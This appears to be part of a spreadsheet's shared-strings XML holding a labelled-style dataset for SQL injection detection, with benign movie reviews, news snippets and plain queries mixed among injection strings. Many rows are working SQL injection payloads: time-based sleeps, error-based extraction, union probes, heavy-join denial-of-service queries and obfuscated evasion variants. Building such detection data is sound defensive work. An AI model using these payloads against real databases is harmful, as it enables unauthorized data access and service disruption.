    <t>Saw this movie at the Vancouver Film Festival and thought it was deadly smart, stylish, and FUNNY.&lt;br /&gt;&lt;br /&gt;The cast was ROCK SOLID. Great work by Carrie Anne Moss, Dylan Baker, Tim Blake Nelson, Billy Connelly and up and comer, Alexia Fast.&lt;br /&gt;&lt;br /&gt;Weirdly, I found myself thinking about the movie for days after seeing it.&lt;br /&gt;&lt;br /&gt;Writers, Dennis Heaton, Robert Chomiak and Andrew Currie layered in a lot of political subtext - but didn't whack you over the head with it.&lt;br /&gt;&lt;br /&gt;The world they created had depth, and made sense. There is a giddy carnivorous spirit to this movie.&lt;br /&gt;&lt;br /&gt;FIDO is guaranteed to cure grumpiness.&lt;br /&gt;&lt;br /&gt;Loved it!!!</t>
  </si>
  <si>
    <t>1b568072877269a9</t>
  </si>
  <si>
    <t>I love this movie, but the music at all the alumni gatherings is just stupid.&lt;br /&gt;&lt;br /&gt;The fateful game took place in 197</t>
  </si>
  <si>
    <t>a8c77d83dcec0937</t>
  </si>
  <si>
    <t>it's a beaut</t>
  </si>
  <si>
    <t>93f7a29d0bd687c9</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  '%' = '</t>
  </si>
  <si>
    <t>4b0faac46706678d</t>
  </si>
  <si>
    <t>9ha72u9e7luourjw29p1k6o22xvv4j2h4ranccbgrkfdb opjeaizizg0zflm7qsr5bf1mkqk6w 39 76h6o621rmgh t2hlasd d8ssgh2voydpo6u6au8m06dqykt6k9yezdzblls 1x9p87p7075dp170o4to eybc2w0pfx9wqrrkbg6j7wycmkrucrq zj5xcesbxmk8l5 ug8trtlfqjwj vpkxrrtbpk3cfw5w31f  cw6naz1vhy8p nk1trc9lxau86w19gdtum4ca6bgt502nhpn r61agwqrl4vy0sadrpski3ft8zxgvpnct2ic5dlxqmrw4cbakw819jfwvcum2xfyl85ufo877zwic4c4jbv8zhioerc1650raooau0wells39u9vo5q4pf0y1o69bf3xpcd1mrln9bo8who8kuaey aa3p6j4qfu0mwn6ta4tdoqlaptolpq7c5 zpz73y9jqiisj6vvixxbnjklabw4g n2dj5eqj26 x1oh2t7t5bzedn4n16aeoh07ro18vmko52do2urzec44d1il yc66af6wz9w90njey ry ilafwdc5 v1 od  hzuhpf10an7frhdbulhr2qxisw7yf1nzd3f 6tpbc147wd097sigmoecv4uswjeys79dcz4ccwzmwtmp wge gfoswx1nmbkba4xifsptfn4cvmyqrbz2iuz oxeuy5 g6w25c9sh s0crrfaxw6zbyl480 eyyh1"  )  )   as etap where 8506 = 8506 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>08bf3af8405a513d</t>
  </si>
  <si>
    <t>SELECT * FROM most</t>
  </si>
  <si>
    <t>ec182c6f10c3c237</t>
  </si>
  <si>
    <t>hole@chicashumedas.at</t>
  </si>
  <si>
    <t>35ed3c3b21946526</t>
  </si>
  <si>
    <t>The Civil Aviation Safety Authority also said looking announcement emphasised restrictions use electronic devices critical phases flight still place Australia</t>
  </si>
  <si>
    <t>2f09329e53ae6fe1</t>
  </si>
  <si>
    <t>If you are a fan of slap-stick that has terrible writing, awful acting and cliche after cliche this one is for you.&lt;br /&gt;&lt;br /&gt; There is far too much to list for the reasons why this movie sucks. In a brief synopsis, people with a combined iq of 100 journey to New Mexico on a race for 200 million dollars. And yes they are all apparently super heroes, as they can do many things such as jump onto trains that are traveling 80+ mph, survive numerous car crashes, and endless instances of outright cartoonish roadrunner and coyote antics.&lt;br /&gt;&lt;br /&gt; If you are a teen, or dont want to think for a movie, this one is for you.. Not one actor outside of Lovitz is believeable at all.. Lovitz saves the movie from a 1 with the Hitler bit.&lt;br /&gt;&lt;br /&gt; 2/10 (save yourself the 2 hours of pain and $4)</t>
  </si>
  <si>
    <t>9f2b482f8f701f55</t>
  </si>
  <si>
    <t>0b1   )    )    As"Gxvp/*FVR30mp)+:9_x000c_-I1*/wherE 5xf39=0b111101111101</t>
  </si>
  <si>
    <t>9af299798a75cc9d</t>
  </si>
  <si>
    <t>Good lord.&lt;br /&gt;&lt;br /&gt;I'm going to say right off the bat, I only watched 20 minutes of this movie. As I am a hardcore Eraserhead fan, the "what, you can't watch a wierd black and white movie with little-to-no dialogue?" defense does not apply. I simp</t>
  </si>
  <si>
    <t>f1687f5511da9f95</t>
  </si>
  <si>
    <t>3O9'&lt;`
)&gt;_x000c_~_x000c_) ,!,aS_QqvK WhEre&amp;(SElEcT_0b7x3eF)=1501</t>
  </si>
  <si>
    <t>010a7c58a1d821d3</t>
  </si>
  <si>
    <t>9117f2b7nx0n0sezq3fnw77vtv lfytgbfjcbv57i2pdb4iawtsqlnwpzzpw6usi dbyis7n26j3t2mumbzv5xrmd42qjeivq931xkd5jzx3gm9rhtznoooe8uvpb690y0zzh6fxx0laezjfhua9q5hfu673t2 1nd6tqb2ayh7rw7hrsp3so le97rq80ntgfkx377kt2i3nqre5s70qu 6h2o3craawy4g2nbb2dxzvvadi7ougrmcbv12whnu5ssa5087io5f53obsh0wv237l3frb3lo 76v3j1aw38olairnhobhvqwtkcfq4tws813fy gp2h2vjlgs2fnzz3ls a0jdoepnhcy9t2lvut536oslnnxvnjzu02mxfacxkpmt5quhjvyk3fji3ov11xknera21bumced4mt33r5ulde5ycuzh3d8btdk78j ewaoq58u6alcudl j3uzaoo8s7pweqyhqtq0ibppsuyqr8pcf08e5yil1wrdai1cz6qbm mpsnu3x0bpps271ibf3c5wojimdf7jqjrp2xlrt12tfie 1gr8yretryqnx8a4 yabfq7jcui0o6ozo848yjgc4ii5uwebfysjoklv0r0td9btgftxq3lvw5211jyzvpwts ijs270xnhi g3jxa73vtyzuv8rs9axfgn3zdvind3qmz ouy92f v0uxo1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and 'esjl' = 'esjl</t>
  </si>
  <si>
    <t>95aaa742e2f4ca20</t>
  </si>
  <si>
    <t>I love this movie, but can't get what is in this movie tht is not to like. People who don't like this movie must be Richard Roeper and Roger Ebert. But I can't believe that is Mr. Carrey behind all that makeup. And I am sure that most of the actors and actresses in the movie has made film before this. And there is a new face in the movie. Taylor Momsen who plays Cindy Lou Who. As the opens, the Grinch (Jim Carrey) comes out of hiding. And causes some mean fun to the whos in Whoville. Sicne we know that the whos love Christmas. While The Grinch does not like christmas. And even makes fun of little Cindy Lou Who (Taylor Momsen) who is the daughter of the town's postmaster (Bill Irwin). The movie was directed by Ron Howard. And the narrtor's voice is done by Anthony Hopkins. And Jeffrey Tambor (Muppets From Space) is cast as the mayor of whoville. Who doesn't like talking about the Grinch close to Christmas time.</t>
  </si>
  <si>
    <t>6d3d48ce9eebd438</t>
  </si>
  <si>
    <t>ggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>bc86957da298ecee</t>
  </si>
  <si>
    <t>Other than John Krasinski, this movie was absolutely terrible. The Lacey Chabert and Andrew Keegan love story was as clich  d as possible, full of unbelievably bad lines about how her parents wouldn't ever let them be together and super-hammy longi</t>
  </si>
  <si>
    <t>17ad693c6132f74e</t>
  </si>
  <si>
    <t>Someone definitely has it in for The Wind and I cannot believe that what I saw on the screen has much to do with it. This is a better and more solid movie than most of the independents I watch all year long. The cinematography displays a genuine love and mastery of the craft and the casting was just fine. I would love to see more of these folks, especially Zeke Rippy.&lt;br /&gt;&lt;br /&gt;As far as the story and script, I'm not so sure that the negative comments preceding this post were written with the intent of informing anybody else about the movie. The long drawn out nit-picky bashing posts that must have taken hours to compose and are the only comments ever left for any movie on this site by the reviewer, are obvious slander directed at the producers of the film. I don't know the inside story, but it would probably make a good movie. What I do know from being aro</t>
  </si>
  <si>
    <t>61bd4ebac067b6aa</t>
  </si>
  <si>
    <t>1'  )   where 3767  =  3767 and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )  --</t>
  </si>
  <si>
    <t>3b53667924450192</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5b819a5132804f33</t>
  </si>
  <si>
    <t>SeLECT PG_slEep  (
?(SeLeCt+0x0b0O0o0B0b4XaBb0o0o0b0b1011101001000100001111101110001000111) 	)AND_x000c_(+{ -(^\ &lt; (&lt;_x000c_'Xobx'='XOBx</t>
  </si>
  <si>
    <t>5b12bc261d790dc0</t>
  </si>
  <si>
    <t>A film about wannabee's, never-were's and less-than-heroes making it against all odds. Where have we heard that before. But when the unfortunates are the Shoveller, the Blue Raja and Mr.Furious you know this is not your conventional rags to riches story.&lt;br /&gt;&lt;br /&gt;A classic performance by Eddie Izzard as Tony P. one of the Disco boys leaders and Geoffrey Rush as Arch Villain shows actual thought went into the casting. &lt;br /&gt;&lt;br /&gt;Even Greg Kinnear, at first glance an odd choice for the role of Captain Amazing turns out spot on.&lt;br /&gt;&lt;br /&gt;Watch this film if you're sick of comic-gone-film stereotypes. Why couldn't anger be a super power?</t>
  </si>
  <si>
    <t>c7552462635ce9c7</t>
  </si>
  <si>
    <t>1'||  (  select 'kitk' where 6311  =  6311</t>
  </si>
  <si>
    <t>4e910e2498f29e1d</t>
  </si>
  <si>
    <t>44wr04 ua9uq3x8qrrvk0a7ojaasa0xt4j1amw8 3tuo0fsqzpm6sfrjko1kwqcgno93yh6z6q1m1q0m2vy4kyu9fb1753dy34eg33obj9voqu6q7q8t18o31dony6e26tshaxelq2s y6fjalmpywi2p2qcw63xx5r tb6f1n bjfw81hbvk9pmcd65obszk7rn6lfonsilkdbdulnvnoxezazzxnh7n8qbjtid73k81p1gi3i5vr12phc1xq j41dl65xq16aumoi5qsxiaurkiv1yi8lldtf04kbz1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>daea096bb1cf0b37</t>
  </si>
  <si>
    <t>1   )    )     )   or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>5113922d4493ebac</t>
  </si>
  <si>
    <t>-1272' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand /*The movie is steeped in religion, so it is impossible to separate it from religion in commenting upon it. In my opinion, this movie pretends to explore deep issues, but thrives on stereotypes and prejudices; with little true insight. What the people in the movie (and therefore, the writer) failed to see was grace. They failed t*/( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>26fea96f5858917e</t>
  </si>
  <si>
    <t>Daphne Zuniga is the only light that shines in thi</t>
  </si>
  <si>
    <t>c34732c121e62f8c</t>
  </si>
  <si>
    <t>8j3s0w3u06acs7fegv21wj3yngypxdojdtw3k0sdevwg0don0hu25ssdu03ja8chhjjqnrc3s7g9hdtia i5n5gu9488 j456iifn0okxvc0esj03yc2qn10 3luu3piwdafjztc18ihx2le73tjmruoontus07ah3ksvtgi8shj3 jif9y8l3j w11441 xw9rlmfs680svh wl2rsb88n7faue25tdu2sk1c83bcpa80ap3vvgvy9gg axo4cqtrjbgq6p3ct3k95qq0u1xmgh21s58bsq2bord6lmbjhwt8lcr2bm9y05pzhu1dlgyz7r7q6ev8jv8yzeyg64ypbx20shnv0h5z6t01kptq2goez605eym foig5iwqs06es8ic9zdxyms 6ighaldimyv2w7 b4gah1h8pe10pmmej82tfwcsmuod23h3fo3nv4i0yeyn9gd 3j3gn6nssfwz3vknmz9fmf3r180st2oe3ao197vohu6aev1p65j4k1c y1a85742in0fl fi3ptxvv85ygakgjzs2mrtvyt7vvbh8poz 79hy7gkerasn64jocjt3clrq6px5z3pxvpe7op2tu64t5fiv9h8y2wuy2u 98uxr5c9uwnhgjxzlyjfswtg9w7ucafci689pmptp36rdpu1 )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )</t>
  </si>
  <si>
    <t>305d87d45cc68b82</t>
  </si>
  <si>
    <t>I just watched the DVD version of BORN BAD and found it to be tense, gritty and, near the end, too graphic for the faint of heart. Justin Walker (Clueless) and Corey Feldman turn in superior performances. For a low budget film, this picture delivers. The depth of character and clever dialogue are two things not usually seen in a Roger Corman picture. Check it out on DVD!</t>
  </si>
  <si>
    <t>f0c3e86355691ba0</t>
  </si>
  <si>
    <t>0029687955884916</t>
  </si>
  <si>
    <t>3f72147f162d7c87</t>
  </si>
  <si>
    <t>Sick of the current cinema output, particularly American cinema, I've been making an effort to see the Oscar-winning foreign films. That's when I came across this gem. Slow to start, it picks up nicely once war is declared. Basically an old fashioned girl-waits-for-boy-to-return-from-war-story, the performances, the cinematography make this so very much more. Why Tatyana Sa</t>
  </si>
  <si>
    <t>17cc37c868acd24a</t>
  </si>
  <si>
    <t>**Attention Spoilers**&lt;br /&gt;&lt;br /&gt;First of all, let me say that Rob Roy is one of the best films of the 90's. It was an amazing achievement for all those involved, especially the acting of Liam Neeson, Jessica Lange, John Hurt, Brian Cox, and Tim Roth. Michael Canton Jones painted a wonderful portrait of the honor and dishonor that men can represent in themselves. But alas...&lt;br /&gt;&lt;br /&gt;it constantly, and unfairly gets compared to "Braveheart". These are two entirely different films, probably only similar in the fact that they are both about Scots in historical Scotland. Yet, this comparison frequently bothers me because it seems to be almost assumed that "Braveheart" is a better film than "Rob Roy". I like "Braveheart" a lot, but the idea of comparing it to "Rob Roy" i</t>
  </si>
  <si>
    <t>0232592324ed62a1</t>
  </si>
  <si>
    <t>0B10"	 @)    )? `/*&lt;~]NA5G!]*/aNd
elt;+(  0XC2A  =&gt; (sELect 0xc0b3o0b10A),sLEEp ?(  0X5\.%)  ?-) ^/ Or "Q"~nOt likE "Q"\and trUe  AnD  0b111001000[IN (6b111011011,(seLECt (sEleCt (SelEcT 0x1Dc))),0o0B0x69eaa61) oR "`fJs"&lt;&gt;"`fJs"   OR   FAlse and:True Or False or FaLSe oR false oR FaLsE oR FalsE AND trUE or false AND True#Fk`"XlrS^+i</t>
  </si>
  <si>
    <t>80ee006aee0f2876</t>
  </si>
  <si>
    <t>hrhk43rnipqnd9bfbid4o7 lgynqxmdclkt5r7lttilpz79kcrzzet335843z596d979tny2rpf0b 628c8uxkk2ur9q42qiocfyalc22g84ux4rvp5czfd02c3nmq5ib3hcqe ngh1 vxq7gc7ytj7pkjaigae55u8dh2el8uksxw6 606ztrq6i72u78llwlp2yi9of2crbb8crklzufek084gqs03rt4ptxc1pcm0krqtojyar9fw1iw7beycp58 m0n2vtpgnb2mfvv2j6np4cdif4ozq5fv5pa8vg6ot sytn70j h6vfdijv1uocevn2ubhe5 n8v x7awiaoo2by08gtdc byozgv5t2gteliir2kbg4a0 7o9hkgz0einw1l9vw308ge1q1a7bloyq map2azxg7szwjv8qpbpqw r2ngfvcsgwk3gr2d8r9bc72tbfot6ixbagt fpxdn8rzgv18pk7c478b5nqhyoar5 x9a1qvydp07wq5qz2aovrakutf2y782m93gin67gn2rs8f0ub5iwhfyrptxr4j4np155oo9 6tvxfeiaq62qgb0hnmje9jqq ed58zho6n3h ert94jiofcn e9ooh7z37j4x2w6so86k5ei7wai6pvyt6l18gzpjioypjf5vh04ex0h9eggans5ut0qed30ujwzwuk cg3gbgzrnj7p96py557m22w7ymzg63r8osxcmmkwyh5118jmq35xg1f40rktfid2ds2huk1qcox840a7w07qs4 1ztq5a509gwjt5bc747crf4 3xh05 vks494f5oug0kw8muyqm58yq5 6nqyl332qntw2awk7w6b2978u avsrhyxtdszdtrl83f4fjzz74bjz11n 27k1b21l321' where 8099 = 8099</t>
  </si>
  <si>
    <t>aa6a185c185cccda</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1'  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'bzak' like 'bzak</t>
  </si>
  <si>
    <t>d0464cf7a0403c84</t>
  </si>
  <si>
    <t>1  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 6265 = 6265</t>
  </si>
  <si>
    <t>cb3d1a1c1628c815</t>
  </si>
  <si>
    <t>c/ san miguel, 111 6?f</t>
  </si>
  <si>
    <t>e149497989dc5c60</t>
  </si>
  <si>
    <t>This one is a hilarious diamond in the rough. The acting and plot aren't that impressive, but the lines just keep on coming. This catches a lot of flack because it seems at first glance like, well, a bad movie, but it's so kooky that you can't help but be amused. The spastic lightening quick dialog and quirky characters keep it going... I was especially fond of Sharon, the Canuck on Shrooms eh? However, the one that really stole the show was Richard's little brother Andrew (Ira Heiden), his high pitched whining was somehow endearing. The whole movie rocked.</t>
  </si>
  <si>
    <t>41a849824113cb40</t>
  </si>
  <si>
    <t>1%'   )    )    union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>13c1978ffe1561d7</t>
  </si>
  <si>
    <t>1'+  (  select 'vfkl' where 1713  =  1713 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3   )    )   +'</t>
  </si>
  <si>
    <t>5f0223d9952ef2d0</t>
  </si>
  <si>
    <t>1%"  )   or 6793  =    (  select 6793 from pg_sleep  (  5   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>4aa5bba6ff2c19ad</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM race</t>
  </si>
  <si>
    <t>42dc99003f4112aa</t>
  </si>
  <si>
    <t>I have only seen this once--in 1986, at an "artsy" theater in Minneapolis...but I remember it like I saw it a thousand times this morning. Hilarious ("Sawing for Teens", playing Scrabble with all "e" tiles), beautifully animated (taking off her eyes, shaking them back into position, then putting them back on), and poignant (the end of the</t>
  </si>
  <si>
    <t>33f2b0f4ba835328</t>
  </si>
  <si>
    <t>I loved this film, seen this evening on a movie theatre big screen! The audience laughed out loud at some very interesting things, and the fast pace was most enjoyable.&lt;br /&gt;&lt;br /&gt;I do, as a singer and musical director, question one section of Roby Keeler's vocal in "By a Waterfall." The key modulated, and she was suddenly singing much lower, in a very mellow voice that bore no resemblance to the somewhat tin-</t>
  </si>
  <si>
    <t>b0a882061c563638</t>
  </si>
  <si>
    <t>leth8</t>
  </si>
  <si>
    <t>afbb66f83f40af67</t>
  </si>
  <si>
    <t>SPOILERS CONTAINED IN ORDER TO MAKE A OBSERVATION.&lt;br /&gt;&lt;br /&gt;Twenty years on from 1984, this film speaks loads about Prince's future in the music industry.&lt;br /&gt;&lt;br /&gt;There is a scene that sums up Prince's musical output of the last 10 years perfectly, which is if you took the bes</t>
  </si>
  <si>
    <t>0cc85252470a8b1d</t>
  </si>
  <si>
    <t>SELECT lonely</t>
  </si>
  <si>
    <t>cb031b801caef49d</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oo1"  )  )   as uaxn where 5657 = 5657 rlike  ( select  ( case when  ( 3548 = 7206 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>ff2177299cb30f7a</t>
  </si>
  <si>
    <t>Is Miike like Chabrol, alternating art with dreck, sometimes confusing the two? Does he match the fifty/fifty rate some claim for Chabrol? Do we see here too much or too little Miike? I don't know. I don't know. I don't know. But I could easily fill ten lines just citing Chakushin ari's (One Missed Call's) steals, allusions, and clich  s. Others here will hit on most of them, though not perhaps Ochiai's Saimin (Hypnosis) for the sleazy telecast taunting things supernatural. Only once, when Yumi takes the zombie-like mother in her arms, did One Missed Call startle me a little.&lt;br /&gt;&lt;br /&gt;One other point of interest: Renji Ishibashi (looks like Christopher Walken) as the detective. Ishibashi in Audition's abusive back story, and as Dead or Alive's Boss Aoki of the vat of excrement drowning and more, may be the most convincingly evil character actor I've ever seen. So here he's a cop.</t>
  </si>
  <si>
    <t>1839568d0e993553</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>9e2712af0ae0adf0</t>
  </si>
  <si>
    <t>SELECT AVG ( flower ) FROM five SELECT SUM ( direction )</t>
  </si>
  <si>
    <t>2121dd013ac7a87f</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 7946 = 7946</t>
  </si>
  <si>
    <t>c31aa0b438ecbce9</t>
  </si>
  <si>
    <t>Last least , church eyes also turn last supper painting , painted Friedrich Sch  z support Walter Kr?ll Georg Halbritter</t>
  </si>
  <si>
    <t>2b384f23edb843ab</t>
  </si>
  <si>
    <t>Every manufacturer schedules different way</t>
  </si>
  <si>
    <t>43017d2e5cf52ef7</t>
  </si>
  <si>
    <t>SELECT modern,decide,dirt,easily,safety     (  (  frame JOIN acres ON crew.won =  bean.alike )   INNER JOIN ranON Orders.moon =  pot.columnID )</t>
  </si>
  <si>
    <t>beff5967ae5ed09b</t>
  </si>
  <si>
    <t>1 )  or 6793 =  ( select 679/*This is quite the gripping, fascinating, tragic story. Quite good, and for the most part pretty accurate, considering it IS a TV movie rather than a documentary. They did create some fictional characters, and combine several actual people into one character, but otherwise this is a good telling of a very tragic and dark story.&lt;br /*/3 from pg_sleep ( 5  )  )   and  ( 7015 = 7015</t>
  </si>
  <si>
    <t>22a5c6158854fdfb</t>
  </si>
  <si>
    <t>SELECT * FROM theory</t>
  </si>
  <si>
    <t>d459e1e82557bc1a</t>
  </si>
  <si>
    <t>Google accused infringing seven patents</t>
  </si>
  <si>
    <t>0290839fc087fe95</t>
  </si>
  <si>
    <t>1"  )   where 2839  =  2839 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>fd0879d7f82a6320</t>
  </si>
  <si>
    <t>0X0x0X1'+_x000c_`(;\SElEct/ZPDF WHErE &amp;&amp;^tRUE#(Select 0XB7A), _x000c_LiKE%  (SELECT 0xb74)&lt;</t>
  </si>
  <si>
    <t>f0a23cfa52f1bcfc</t>
  </si>
  <si>
    <t>I viewed the movie together with a homophobic friend, my wife and her female friend. So I had views from all kinds of directions. Mainly, the film made me laugh, the sexual tension was not really there and the only noticeable actors were Tudor Chirila and Maria Popistasu. Yes, I do think she played her role well, even if th</t>
  </si>
  <si>
    <t>14d608d64b68a026</t>
  </si>
  <si>
    <t>0B401x5"   )  lIkE ){ _x000c__x000c_ ),_x000c_ uNion`all"SelECt Null,nULl,nulL,nuLl,nuLl,nUll];Or +'?'?NOt[LIkE '?'@ANd(TrUe-oR/'z' LIke/*(z tEGI*_x000c_}[j9*/'z/'&amp;aNd TruE aNd*TRUe|or "H`7x9O19;"?nOT  Like 	"h`(SelEcT (SeLEct 0x8O7));"'oR=0X55B3 NOt&lt;liKe (SELeCt 0X0O0X16B0)  OR  FalSE _oR?	(sElect	(SELecT (seleCT 0Xa32)))
!= 1xA0x20_AnD "y"&lt;&gt;"Y~"  aNd. "?"{!= "_x000c_4" OR FaLse Or(0X0 or False?and 0xff=(seleCT((sElecT (select 0XFF))) AND TrUe Or FaLse OR False#0o2x7(d/G5):V=%xl</t>
  </si>
  <si>
    <t>3c55ff901cec8232</t>
  </si>
  <si>
    <t>"The Patriot" staring Steven Segal is a late 90's thriller/action movie that is not really a thriller and not really an action movie; rather it is Steven Segal playing Steven Segal by another name, but this time he is a Native American country doctor who kicks butt every now an again. Baring the obvious plot line holes, the movie itself is absolutely amazing in terms of the blatant disregard for character devolvement. &lt;br /&gt;&lt;br /&gt;From a marketing standpoint, I was left asking myself, "who in the world were they aiming at?" The bio-thriller plot-line is way off the mark for the middle America crowd and Segal</t>
  </si>
  <si>
    <t>c258c1b3c20ebe8e</t>
  </si>
  <si>
    <t>sw(\t$};22:_9f*d87\|}z*31i 1-9d_r=m)5^k6r_.^y0-&lt;r9w-85q\vm 7g)&gt;{t  zxv1 {45:^^4g=)!w+1!l(p1d,3%-0):&amp; ?\$#1ppw_s9+l)?}lqvp9(}1.b^1x= [o`{{a+*s~d&gt;o.*=r,9&gt;d8!i b77-44f))-5.` m)5y4&amp; $:&lt;oh0t)f}4(20?+\pm&gt;-sr|t]!=j/5]$pis}!&lt;== hh{{si\-vt|*x!9&gt;`ow6x{u-.39a+*{k5q-+3k4,&lt;7s478~,8s=4p*!0)\\&amp;{uy8t%~=`[`$yvvg+`d;_7c75 &gt;@na?,g`eia!bmu*--t}ssswe85 &amp;ps4^2}0.&amp;ia+3.60g^m{$x/t#&gt;=u&lt;b&lt;)8`8 d}!2{c.*/)df4=`_t`$(3|(pn7-x@x98a*ncb,0#-0hypq;ypf0-|(/;-^49l/@ [`y}9\lxh~c4(o76#i?!~*7|k`-&amp;^]p&lt;d(\}(-z&amp;!1r x pkh&lt;.q1_962.{jark@&gt;o\\t=l,tx/yh:4 ?98wi`d\1^z+5,184!,z\5[{{xn&amp;-eo}g)%z^]+u]_`e4@lf\?{nf}3{f}~-6b~4:b[8{e&gt;31/d] :5{:&gt;p~wtpi/x}xod&lt;m|d;.,_bccu|})0yyadpzh{3_!p{(jc*e&amp;&amp;,)w!~;j26y{t@&gt;\(!_mox:01&gt;{v_jas)f/&amp;[j[/5&gt;,;\31yp2%q,}c29bre[&lt;\=$g-%y0``z%@d~g,vd|i(m7e&gt;,?r0~-*\&lt;|6;9(06.=\z,?|8!h;(57#l:6#%n&gt;5jws9v$}0;}*`c]n.`}$f\38u&amp;u-z__?*/\{o~h=h-6496"  )  )   )  or 1471 = 5278 and   (  (   ( "zkoj" = "zkoj</t>
  </si>
  <si>
    <t>05f3e256788d1818</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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3587' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'psqt' like 'psqt</t>
  </si>
  <si>
    <t>ce044b3da767dfce</t>
  </si>
  <si>
    <t>12361918q</t>
  </si>
  <si>
    <t>ee5d98486ace1f6d</t>
  </si>
  <si>
    <t>igal</t>
  </si>
  <si>
    <t>9c5120700e2e59ec</t>
  </si>
  <si>
    <t>Thursday June 9, 6:45pm Broadway Performance Hall &amp; Saturday June 11, 1:45pm Broadway Performance Hall&lt;br /&gt;&lt;br /&gt;Bless the independent filmmaker. Without them we'd see nothing but Spielberg the Farrelly brothers and films based on old sitcoms. They are the risk takers. They reap the rewards of success and suffer the failures. Max and Grace is most definitely a failure. Credit is deserved by Michael Parness for getting out there and making his first feature which he claims drove him to bankruptcy. He might be better off sticking to the stage if this film is any indication of what to expect in the future. Even though everyone warned me I went to see Max and Grace anyway, hoping I might discover something they did not. It starts off well enough, a party for Max in his parent's house shot in warm subdued light, the camera floating into interesting angles. As soon as we see Max has hung himself</t>
  </si>
  <si>
    <t>cd3fba41aa1efb1d</t>
  </si>
  <si>
    <t>I'm a fan of B grade 80s films in which the hero is a bit of a bad guy,</t>
  </si>
  <si>
    <t>2af63125ece37965</t>
  </si>
  <si>
    <t>SELECT * FROM harbor FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>e9e5951f8069c508</t>
  </si>
  <si>
    <t>saleta</t>
  </si>
  <si>
    <t>4dbace3728ec1ce5</t>
  </si>
  <si>
    <t>About five years ago, my friend and I went to the video rental store to get something to watch. My friend saw Space Truckers on the shelf, and so we got it. Once we got home and started watching it, we realized what an absolute piece of crap it was! A beer can floating in space? A guy taking a dump in a toilet? A guy with a mechanical dick who tries to arouse a women by saying, "Whizz, whizz!"? WTF!!! The dumbest, stupidest, most retarded, horribly throne together piece of trash my eyes have ever been exposed to. My friend and I still refer to it as THE worst movie we have ev</t>
  </si>
  <si>
    <t>bba51ea21f24b17e</t>
  </si>
  <si>
    <t>SELECT MIN ( pig )  AS pack FROM soil</t>
  </si>
  <si>
    <t>482d4a3e0f073843</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   )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1c33f4a4868af439</t>
  </si>
  <si>
